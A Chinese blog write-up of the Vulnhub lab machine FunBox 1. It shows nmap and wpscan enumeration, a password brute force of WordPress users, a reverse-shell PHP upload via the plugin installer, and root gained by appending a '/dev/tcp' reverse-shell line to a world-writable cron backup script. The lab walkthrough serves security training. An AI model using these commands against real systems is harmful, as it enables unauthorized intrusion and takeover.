Vulnhub靶机:FunBox 1

最新推荐文章于 2024-06-20 00:00:59 发布
最新推荐文章于 2024-06-20 00:00:59 发布
阅读量1k 收藏 23
点赞数 27
分类专栏: 靶场 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48904485/article/details/135727881
版权

一、介绍

运行环境:Virtualbox

攻击机:kali(10.0.2.15)

靶机:FunBox 1(10.0.2.26)

目标:获取靶机root权限和flag

靶机下载地址:https://www.vulnhub.com/entry/funbox-1,518/

二、信息收集

使用nmap主机发现靶机ip:10.0.2.26

在这里插入图片描述

使用nmap端口扫描发现靶机开放端口:21、22、80

在这里插入图片描述

打开网站,访问ip会跳转到funbox.fritz.box域名,修改hosts文件,vim /etc/hosts添加一条数据,再次访问网站

10.0.2.26         funbox.fritz.box

在这里插入图片描述
在这里插入图片描述

使用dirsearch爆破目录,发现网站为wordpress模板搭建的

在这里插入图片描述

三、漏洞利用

直接使用wordpress扫描器wpscan进行扫描

wpscan --url http://funbox.fritz.box/ --enumerate u,p,t --plugins-detection aggressive --detection-mode aggressive

在这里插入图片描述

枚举到两个用户名:joe、admin,使用wpscan对这两个用户进行暴力破解

wpscan --url http://funbox.fritz.box/ -P /usr/share/wordlists/rockyou.txt -U user.txt -t 100

在这里插入图片描述

破解成功:joe\12345、admin\iubire

登录admin账户

在这里插入图片描述

直接在安装Plugin处上传php-reverse-shell.php文件,无需压缩,可能没有返回成功上传的提示,但是到/wp-content/uploads即可看到所上传的文件

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

获取shell

在这里插入图片描述

使用python获取交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述

四、提权

访问home目录可以看到有两个用户,funny和joe

在这里插入图片描述

看到joe用户,想到使用wpscan暴力破解的得到的:joe\12345,是不是可以用这个用户名密码登录joe的ssh呢,登录ssh,登录成功

在这里插入图片描述

好吧,发现joe用户cd命令受限,还是使用web漏洞得到的shell吧

在这里插入图片描述

在joe的home目录下发现一个mbox文件,查看是一个邮件信息

嗨,joe,请告诉funny备份脚本已经完成。

在这里插入图片描述

在这里插入图片描述

可查看funny的home目录,有一个.backup.sh备份脚本,所有用户都具有读写执行权限

在这里插入图片描述

查看备份脚本,该脚本会把/var/www/html目录备份

在这里插入图片描述

仔细观察发现funny目录下的html.tar创建时间会随着时间变化而变化,可猜测funny用户对备份脚本创建了计划任务,每分钟备份一次

在这里插入图片描述
在这里插入图片描述

我们可以在备份脚本写入反弹shell命令,来获取shell

echo "bash -i >& /dev/tcp/10.0.2.15/8888 0>&1" >> /home/funny/.backup.sh

在这里插入图片描述

耐心等待,反弹shell成功

在这里插入图片描述

获取交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述

发现获取的shell为funny的shell,找了一圈,没有发现获取root权限的方法

上传pspy64查看靶机的进程,有一个root的计划任务和funny的计划任务,root是5分钟执行一次,funny用户是2分钟执行一次

在这里插入图片描述

重新监听,多监听几次,成功拿到root权限shell

在这里插入图片描述

获取flag

在这里插入图片描述

参考链接:vulnhub-wp-funbox1 - rightevil - 博客园 (cnblogs.com)

huang0c
关注
  • 27
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Vulnhub靶机系列:De-ICE: S1.120
01-09
文章目录靶机地址靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用知识及工具 ssh、sqlmap、suid提权 信息收集并getshell 先看下web页面 感觉平平无奇,先使用dirb和dirmap目录分别进行扫描 dirb
vulnhub靶机funbox 1
J_linnb的博客
02-20 336
【代码】vulnhub靶机funbox 1。
FUNBOX_1靶场详解
weixin_44681307的博客
07-25 964
发现的确有一个计时任务,有两个用户都在运行,一个是UID为1000的,一个是root用户,只要我们能往这里面写的内容就可以拿到一个root的反弹shell。发现这个文件我们是可修改的,在里面添加了一条反弹shell文件,就等拿到UID为1000的权限或者,root权限,如过没拿到ROOT权限就重新监听一下。ssh上来后,ls一下发现有个mbox文件,发现类似两个邮件,并且是隔了几分钟的,所以就怀疑后台在运行着一个计时任务。这个系列的靶场给出的干扰因素都挺多的,必须从中找到有用的线索才可以。
vulnhub的wp之funbox1
weixin_62246577的博客
10-13 207
vulnhub靶机系列之funbox1
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox1
Aluxian_的博客
09-05 2246
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。老样子需要找到flag即可。1.修改/etc/hosts文件 解析网站2.从新学习了一遍定时提权 (主要是回弹的命令)3.还有一些简单的扫码工具 和枚举工具 这靶机其实很简单 因为太久没做了 所以从新温习一下 主要是学习渗透的思路!
vulnhub靶机实战--FunBox:1
m0_64312309的博客
09-21 474
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤
vulnhub Funbox: 1
箭雨镜屋
07-09 952
渗透思路:nmap扫描----wpscan爆破网站用户名和密码----joe用户ssh登录并绕过rbash----文件权限777定时任务提权(多个用户定时任务执行同一个文件)
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
vulnhub FUNBOX: 1记录
qq_45826388的博客
09-23 335
Description Boot2Root ! This is a reallife szenario, but easy going. You have to enumerate and understand the szenario to get the root-flag in round about 20min. This VM is created/tested with Virtualbox. Maybe it works with vmware. If you need hints, ca
vulnhub靶机FunBox
Keepb1ue的博客
09-28 2974
靶机配置说明: 靶机下载地址:https://www.vulnhub.com/entry/funbox-1,518/ 靶机:DC1 (VirtualBox) IP:192.168.56.109 攻击机:Kali(VMware) IP:192.168.56.108 在下载地址中有也有详细的靶机说明,而FunBox需要寻找的flag总数为1个。 靶机环境配置: 将靶机和kali都桥接到同一张网卡即可,这里我都桥接到virtualBox的Host-only网卡,保证无干扰目标。 靶机渗透开始: 先看下手里的
VulnHub_FunBox
qq_45434762的博客
08-29 553
发现目标主机我们使用nmap扫描整个网段sudo nmap 192.168.1.0/24 扫描端口使用Nmap探测目标主机开放的端口,发现目标主机开放了,21,22,80端口sudo n...
funbox-vulnhub靶机-writeup
Lee
08-14 1538
FunBoxWriteup ##0x00 找到目标主机 使用nmap扫描网段,发现目标 nmap -sn 16.16.16.0/24 //发现目标机器IP为16.16.16.157 nmap -A 16.16.16.157 -v //直接nmap全扫 PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2
靶机渗透练习22-FunBox1
hirak0的博客
04-18 1524
靶机描述 靶机地址:https://www.vulnhub.com/entry/funbox-1,518/ Description Boot2Root ! This is a reallife szenario, but easy going. You have to enumerate and understand the szenario to get the root-flag in round about 20min. This VM is created/tested with Virtua
Funbox1:noname靶机渗透练习
Winsudo的博客
12-23 2800
funbox系列靶机练习
网络安全实战:剖析ThinkPHP 5.1.X反序列化漏洞
weixin_43822401的博客
06-16 623
ThinkPHP作为广泛使用的PHP开发框架,在5.1.X版本中存在一个严重的反序列化漏洞。该漏洞允许攻击者通过构造特定的序列化字符串,实现在服务器上执行任意代码,从而可能导致数据泄露、服务中断等安全事件。
红队与蓝队:有何区别?
最新发布
aihua002的博客
06-20 1340
红队是一种网络安全策略,可模拟现实世界中对系统和基础设施的网络攻击。其主动的网络安全方法使其成为一个关键组成部分,因为它可以帮助组织在恶意行为者利用漏洞和弱点之前识别它们。蓝队是一种网络安全方法,侧重于保护组织的系统和基础设施免受网络威胁。与红队不同,它涉及主动监控、检测和应对安全事件和漏洞。它可以帮助增强组织的整体安全态势,并最大限度地减少潜在攻击的影响。紫队是一种网络安全方法,它结合了红队和蓝队,以促进进攻方和防御方之间的协作。
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huang0c

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值